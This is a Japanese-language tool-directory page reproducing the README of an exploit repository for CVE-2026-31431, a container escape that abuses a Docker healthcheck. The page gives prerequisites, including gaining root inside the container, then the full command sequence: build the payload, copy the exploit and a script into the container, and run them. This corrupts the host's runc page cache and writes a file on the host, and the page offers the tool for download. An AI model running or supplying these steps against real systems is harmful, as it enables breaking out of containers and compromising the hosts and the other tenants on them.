Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-31431-Copy-Fail-Container-Escape — Dockerコンテナでhealthcheckが有効な任意のコンテナから、CVE-2026-31431を介したコンテナエスケープ | Kitploit
ツール/GitHubGitHub/hans362/cve-2026-31431-copy-fail-container-escape
コンテナセキュリティ脆弱性分析エクスプロイトクラウドセキュリティ学習と教育コンテナエスケープ
GitHubhans362/cve-2026-31431-copy-fail-container-escape

CVE-2026-31431-Copy-Fail-Container-Escape

Dockerコンテナでhealthcheckが有効な任意のコンテナから、CVE-2026-31431を介したコンテナエスケープ

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る
2144ヶ月前未レビュー

CVE-2026-31431-Copy-Fail-Container-Escape

デモ

https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e

前提条件

  • CVE-2026-31431 の影響を受けるコンテナ
  • コンテナのヘルスチェックが設定されており、ヘルスチェックの CMD が判明していること
  • コンテナ内で root 権限を取得していること(未取得の場合、Copy Fail を使用して root 権限を取得できます)

このリポジトリには、脆弱なコンテナをセットアップするための docker-compose.yml が用意されています。他の脆弱なコンテナを使用したり、独自のコンテナをセットアップしたりすることもできますが、その場合はエクスプロイトコードを適宜変更することを忘れないでください。

エクスプロイト手順

root@kitploit:~
# ホストマシン上で実行
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh

# copyfail コンテナ内で実行
cd /tmp
chmod +x exp.sh exploit
./exp.sh

# ヘルスチェックが実行されるまで数分待機し、
# ホスト上に /tmp/pwned が作成されているか確認する

# ホストマシン上で実行
ls /tmp/pwned

エクスプロイトが成功すると、ホストマシン上の runc バイナリのページキャッシュが破損します。ホスト上で echo 3 | sudo tee /proc/sys/vm/drop_caches を実行することで復元できます。

クレジット

  • https://copy.fail/
  • https://github.com/tgies/copy-fail-c

免責事項

このリポジトリは教育目的のみで提供されています。悪意のある活動に使用すべきではありません。作者は、このコードの誤用によって生じたいかなる損害についても責任を負いません。常に管理された合法的な環境で使用してください。

ツールをダウンロード